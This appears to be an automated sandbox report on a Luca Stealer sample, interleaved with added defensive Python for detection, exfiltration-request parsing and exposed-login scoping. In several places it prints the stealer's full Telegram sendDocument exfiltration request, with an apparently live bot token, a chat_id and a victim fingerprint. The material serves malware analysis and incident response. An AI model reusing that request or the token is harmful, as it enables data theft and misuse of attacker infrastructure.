
Windows Analysis Report
888.exe

Overview

General Information

Sample name: 888.exe
Analysis ID: 1574586
MD5: b6e5859c20c608bf7e23a9b4f8b3b699
SHA1: 302a43d218e5fd4e766d8ac439d04c5662956cc3
SHA256: bd5532a95156e366332a5ad57c97ca65a57816e702d3bf1216d4e09b899f3075
Tags: exe, user-lontze7

Detection

Luca Stealer
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Luca Stealer
AI detected suspicious sample
Deletes itself after installation
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses the Telegram API (likely for C&C communication)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files

Classification

  • System is w10x64
  • 888.exe (PID: 7888 cmdline: "C:\Users\user\Desktop\888.exe" MD5: B6E5859C20C608BF7E23A9B4F8B3B699)
    • powershell.exe (PID: 2112 cmdline: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found

Yara Overview

Source | Rule | Description | Author | Strings
888.exe | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security |
00000000.00000003.1849050689.000000000131F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security |
Process Memory Space: 888.exe PID: 7888 | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security |
0.2.888.exe.a50000.0.unpack | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security |
0.0.888.exe.a50000.0.unpack | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security |

Sigma Overview

Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data:
    Command: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
    CommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
    CommandLine|base64offset|contains: 
    Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    ParentCommandLine: "C:\Users\user\Desktop\888.exe"
    ParentImage: C:\Users\user\Desktop\888.exe
    ParentProcessId: 7888
    ParentProcessName: 888.exe
    ProcessCommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
    ProcessId: 2112
    ProcessName: powershell.exe
              No Suricata rule has matched
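The Sigma match above is the one process-creation event in this report worth turning into a fleet-wide hunt: an unsigned executable on the user's Desktop spawning powershell.exe with -NoProfile -NonInteractive -NoLogo to run Get-Culture and read back the display language (the Rust-based stealer uses the shell to get a localized culture name). The following Python is an added example, not Joe Sandbox's logic and not the Sigma rule itself. The event dictionaries use the field names of the Sigma data above; the first event is the one recorded in this report, the two benign controls are constructed, and the list of user-writable directories is an assumption you should tune to your estate.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events in the field layout of the Sigma match above.
# The first event is the one recorded in this report; the other two are constructed
# benign controls (assumption: typical admin and installed-software behaviour).
EVENTS = [
    {
        "ProcessId": 2112,
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": ('"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command '
                        '"[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; '
                        'Get-Culture | Select -ExpandProperty DisplayName"'),
        "ParentImage": r"C:\Users\user\Desktop\888.exe",
        "ParentProcessId": 7888,
    },
    {   # an administrator opening an interactive shell from Explorer
        "ProcessId": 4100,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"',
        "ParentImage": r"C:\Windows\explorer.exe",
        "ParentProcessId": 3300,
    },
    {   # installed software under Program Files asking for the culture name
        "ProcessId": 5200,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": '"powershell.exe" -NoProfile -Command "Get-Culture"',
        "ParentImage": r"C:\Program Files\Vendor\updater.exe",
        "ParentProcessId": 5100,
    },
]

# Directories an unprivileged user can write to (assumption; extend for your estate).
# A parent living here is the strongest single signal, so it is required for a hit.
USER_WRITABLE = re.compile(
    r"^[A-Za-z]:\\(Users\\[^\\]+\\(Desktop|Downloads|Documents|AppData)|ProgramData|Windows\\Temp)\\",
    re.IGNORECASE,
)
HEADLESS_FLAGS = ("-noprofile", "-noninteractive")


def is_powershell(image: str) -> bool:
    return PureWindowsPath(image).name.lower() in {"powershell.exe", "pwsh.exe"}


def score_event(ev: dict) -> list[str]:
    """Return the reasons this event resembles the stealer's culture probe."""
    if not is_powershell(ev["Image"]):
        return []
    cmd = ev["CommandLine"].lower()
    reasons = []
    if USER_WRITABLE.match(ev["ParentImage"]):
        reasons.append("parent in user-writable path")
    if all(flag in cmd for flag in HEADLESS_FLAGS):
        reasons.append("headless flags")
    if "get-culture" in cmd:
        reasons.append("Get-Culture fingerprinting")
    return reasons


def detect(events: list[dict]) -> list[tuple[int, str, list[str]]]:
    """A hit needs the user-writable parent plus at least one of the other two signals."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if "parent in user-writable path" in reasons and len(reasons) >= 2:
            hits.append((ev["ProcessId"], ev["ParentImage"], reasons))
    return hits


if __name__ == "__main__":
    for pid, parent, reasons in detect(EVENTS):
        print(f"PID {pid} spawned by {parent}: {', '.join(reasons)}")
```

Requiring the user-writable parent keeps installed software that legitimately shells out for Get-Culture below the threshold while still catching this sample, whose command line is otherwise indistinguishable from a benign locale query.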


              AV Detection

Source: 888.exe | ReversingLabs: Detection: 52%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: 888.exe | Joe Sandbox ML: detected
Source: 888.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49825 version: TLS 1.2
Source: 888.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: WINLOA~1.PDBwinload_prod.pdb | source: 888.exe, 00000000.00000003.1719343963.0000000001357000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\

              Networking

Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected: POST /bot6144496200:AAG-IIb4TPBPT1INBnZWa7iLZBVaG67I2mE/sendDocument?chat_id=-1001562112668&caption=%3Ccode%3E%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.189%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20PGFKD3%20(1280,%201024)%0AHWID:%205146949416814903%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\888.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2020%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0ATelegram:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags%20Passwords:%20%0A%0ATags%20Cookies:%20%3C/code%3E&parse_mode=HTML HTTP/1.1
    content-type: multipart/form-data; boundary=2d88adf10cbad28c-2759270d23c57240-8cf43d1437ebaac5-72f0b48001fd812a
    content-length: 889952
    accept: */*
    host: api.telegram.org
Source: global traffic | HTTP traffic detected: GET /?output=json HTTP/1.1
    accept: */*
    host: ipwho.is
Source: global traffic | HTTP traffic detected: GET /?output=json HTTP/1.1
    accept: */*
    host: ipwho.is
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 108.181.61.49
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: ipwho.is
Source: unknown | DNS query: name: ipwho.is
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /?output=json HTTP/1.1
    accept: */*
    host: ipwho.is
Source: global traffic | HTTP traffic detected: GET /?output=json HTTP/1.1
    accept: */*
    host: ipwho.is
Source: global traffic | DNS traffic detected: DNS query: ipwho.is
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot6144496200:AAG-IIb4TPBPT1INBnZWa7iLZBVaG67I2mE/sendDocument?chat_id=-1001562112668&caption=%3Ccode%3E%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.189%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20PGFKD3%20(1280,%201024)%0AHWID:%205146949416814903%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\888.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2020%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0ATelegram:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags%20Passwords:%20%0A%0ATags%20Cookies:%20%3C/code%3E&parse_mode=HTML HTTP/1.1
    content-type: multipart/form-data; boundary=2d88adf10cbad28c-2759270d23c57240-8cf43d1437ebaac5-72f0b48001fd812a
    content-length: 889952
    accept: */*
    host: api.telegram.org
Source: 888.exe, 00000000.00000002.1849949792.0000000001034000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://ipwho.is/?output=json
Source: 888.exe, 00000000.00000002.1849949792.0000000001034000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://ipwho.is/?output=jsonB
Source: 888.exe | String found in binary or memory: http://ns.adobe.
Source: 888.exe | String found in binary or memory: http://www.w3.or
Source: 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 888.exe, 00000000.00000002.1851135318.000000000448C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot6144496200:AAG-IIb4TPBPT1INBnZWa7iLZBVaG67I2mE/sendDocument?chat_id=-100
Source: 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 888.exe, 00000000.00000003.1849050689.000000000131F000.00000004.00000020.00020000.00000000.sdmp, 888.exe, 00000000.00000002.1850227693.000000000131F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ipwhois.io/flags/us.svg
Source: 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 888.exe | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: 888.exe | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support0
Source: 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.dr | String found in binary or memory: https://www.ecosia.org/newtab/
Source: 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown | Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49825 version: TLS 1.2
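The sendDocument request recorded above is the whole C2 story of this sample: the bot identifier and token sit in the URL path, the destination channel is the chat_id parameter, and the victim profile is a URL-encoded caption, all sent without a User-Agent header (the "HTTP GET or POST without a user agent" signature). The Python below is an added example, not code from the report or from the malware, that parses such a request into the credentials an analyst needs for takedown, the fingerprint fields and the loot counts. The request text is reconstructed from the request line and headers recorded above; the multipart body was not captured and is omitted, and the ipwho.is GET from the same report serves as the negative case.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The exfiltration request as recorded in this report (request line and headers only;
# the multipart body was not captured). The second request is the geolocation lookup
# from the same report, used here as a negative case.
TELEGRAM_POST = "\r\n".join([
    r"POST /bot6144496200:AAG-IIb4TPBPT1INBnZWa7iLZBVaG67I2mE/sendDocument?chat_id=-1001562112668&caption=%3Ccode%3E%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.189%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20PGFKD3%20(1280,%201024)%0AHWID:%205146949416814903%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\888.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2020%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0ATelegram:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags%20Passwords:%20%0A%0ATags%20Cookies:%20%3C/code%3E&parse_mode=HTML HTTP/1.1",
    "content-type: multipart/form-data; boundary=2d88adf10cbad28c-2759270d23c57240-8cf43d1437ebaac5-72f0b48001fd812a",
    "content-length: 889952",
    "accept: */*",
    "host: api.telegram.org",
    "", "",
])
IPWHOIS_GET = "\r\n".join(["GET /?output=json HTTP/1.1", "accept: */*", "host: ipwho.is", "", ""])

# Telegram Bot API paths look like /bot<numeric id>:<token>/<method>
BOT_PATH = re.compile(r"^/bot(?P<bot_id>\d+):(?P<token>[A-Za-z0-9_-]+)/(?P<method>\w+)$")


def parse_http_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, target, lower-cased header dict)."""
    head, _, _body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def parse_telegram_exfil(raw: str):
    """Return bot credentials, chat id, decoded victim profile and loot counts for a
    Telegram Bot API request, or None if the request is not one."""
    method, target, headers = parse_http_request(raw)
    url = urlsplit(target)
    m = BOT_PATH.match(url.path)
    if headers.get("host") != "api.telegram.org" or m is None:
        return None
    query = parse_qs(url.query)            # percent-decodes, so %E2%9C%85 becomes the tick mark
    caption = re.sub(r"</?code>", "", query.get("caption", [""])[0])
    victim = {}
    for line in caption.splitlines():
        line = line.strip()
        if ":" in line and not line.startswith("-"):   # "- IP Info -" style dividers carry no data
            key, _, value = line.partition(":")
            victim[key.strip()] = value.strip()
    # Each loot class is reported as a tick plus a count ("Cookies: ✅ 2") or a cross.
    loot = {k: int(v.split()[-1]) for k, v in victim.items() if v.startswith("\u2705")}
    return {
        "http_method": method,
        "api_method": m["method"],
        "bot_id": m["bot_id"],
        "token": m["token"],
        "chat_id": query["chat_id"][0],
        "has_user_agent": "user-agent" in headers,
        "victim": victim,
        "loot": loot,
    }


if __name__ == "__main__":
    result = parse_telegram_exfil(TELEGRAM_POST)
    print(f"bot {result['bot_id']} -> chat {result['chat_id']} via {result['api_method']}")
    print("victim HWID:", result["victim"]["HWID"], "elevated:", result["victim"]["Is Elevated"])
    print("loot counts:", result["loot"])
```

The bot id and token are the report-to-Telegram abuse handle, the chat_id identifies the attacker's channel, and the HWID plus FileLocation fields give you the host-side pivot for the same victim across multiple uploads.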
Source: C:\Users\user\Desktop\888.exe | Code function: 0_2_00A71340
Source: C:\Users\user\Desktop\888.exe | Code function: 0_2_00C7EB20
Source: C:\Users\user\Desktop\888.exe | Code function: 0_2_00C66F30
Source: 888.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 888.exe | Binary string: }Failed to open \Device\Afd\Mio:
Source: 888.exe | Binary string: N\Device\Afd\Mio
Source: 888.exe | Binary string: Failed to open \Device\Afd\Mio:
Source: classification engine | Classification label: mal80.troj.spyw.winEXE@4/15@3/2
Source: C:\Users\user\Desktop\888.exe | File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dtbqpus9.default\key4.db
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Users\user\Desktop\888.exe | File created: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\
Source: 888.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\888.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\888.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 888.exe, 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 888.exe, 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 888.exe, 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 888.exe, 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 888.exe, 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 888.exe, 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 888.exe, 00000000.00000003.1719296938.0000000001375000.00000004.00000020.00020000.00000000.sdmp, 888.exe, 00000000.00000003.1722280750.0000000001375000.00000004.00000020.00020000.00000000.sdmp, 888.exe, 00000000.00000003.1719742980.0000000001376000.00000004.00000020.00020000.00000000.sdmp, Login Data.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 888.exe, 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
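The SQLite statements above come from an SQLite engine statically linked into the sample, and the dropped files named Login Data.0.dr, Web Data.0.dr and CreditCardData.0.dr show it copying Chromium profile databases to its temp directory before reading them (the password_notes DDL is from the copied Login Data file). After such an incident the responder's question is which saved accounts were in those files. The Python below is an added example for that scoping step, not the stealer's code and not part of this report. The password_notes table is the statement recovered above; the logins table is a reduced, constructed subset of Chromium's real schema (assumption: enough columns for scoping), and the three accounts are constructed sample rows. Password blobs are left as the encrypted placeholders Chromium stores and are never decrypted.

```python
import sqlite3
from datetime import datetime, timedelta, timezone

# Chromium timestamps are microseconds since 1601-01-01 UTC (the WebKit epoch).
WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def webkit_to_datetime(microseconds: int) -> datetime:
    return WEBKIT_EPOCH + timedelta(microseconds=microseconds)


def build_sample_login_data() -> sqlite3.Connection:
    """Constructed stand-in for a copied Chromium 'Login Data' file.

    The password_notes DDL is the statement recovered from the sample's memory;
    the logins table is a reduced subset of Chromium's real schema (assumption:
    these columns are enough for scoping). Password blobs are placeholders for
    the AES-GCM ciphertext Chromium stores and are never decrypted here.
    """
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE logins (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            origin_url VARCHAR NOT NULL,
            signon_realm VARCHAR NOT NULL,
            username_value VARCHAR,
            password_value BLOB,
            date_created INTEGER NOT NULL,
            blacklisted_by_user INTEGER NOT NULL DEFAULT 0);
        CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    """)
    rows = [  # constructed sample accounts
        ("https://mail.example.com/login", "https://mail.example.com/", "alice", b"v10<ciphertext>", 13350000000000000, 0),
        ("https://bank.example.net/", "https://bank.example.net/", "alice@example.com", b"v10<ciphertext>", 13360000000000000, 0),
        ("https://forum.example.org/", "https://forum.example.org/", "", b"", 13340000000000000, 1),  # "never save" entry: no secret stored
    ]
    con.executemany(
        "INSERT INTO logins (origin_url, signon_realm, username_value, password_value, date_created, blacklisted_by_user) VALUES (?, ?, ?, ?, ?, ?)",
        rows,
    )
    con.execute(
        "INSERT INTO password_notes (parent_id, key, value, date_created, confidential) VALUES (1, '', 'backup code 1234-5678', 13350000000000000, 1)"
    )
    con.commit()
    return con


def scope_exposed_logins(con: sqlite3.Connection) -> list[dict]:
    """List the accounts whose saved secrets the stealer could have taken from this file."""
    exposed = []
    query = """
        SELECT l.signon_realm, l.username_value, l.date_created,
               (SELECT COUNT(*) FROM password_notes n WHERE n.parent_id = l.id) AS notes
        FROM logins l
        WHERE l.blacklisted_by_user = 0 AND length(l.password_value) > 0
        ORDER BY l.signon_realm"""
    for realm, username, created, notes in con.execute(query):
        exposed.append({
            "realm": realm,
            "username": username,
            "saved_on": webkit_to_datetime(created).date().isoformat(),
            "notes": notes,   # password notes live in the same file and leave with the password
        })
    return exposed


if __name__ == "__main__":
    for entry in scope_exposed_logins(build_sample_login_data()):
        print(entry)
```

Run the same query against the real file from the victim profile (copy it first; the browser holds a lock on the live database) and you have the rotation list, including any password notes, without ever touching the encrypted secrets.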
Source: 888.exe | ReversingLabs: Detection: 52%
Source: unknown | Process created: C:\Users\user\Desktop\888.exe "C:\Users\user\Desktop\888.exe"
Source: C:\Users\user\Desktop\888.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\888.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
Source: C:\Users\user\Desktop\888.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\888.exe | Section loaded: mswsock.dll
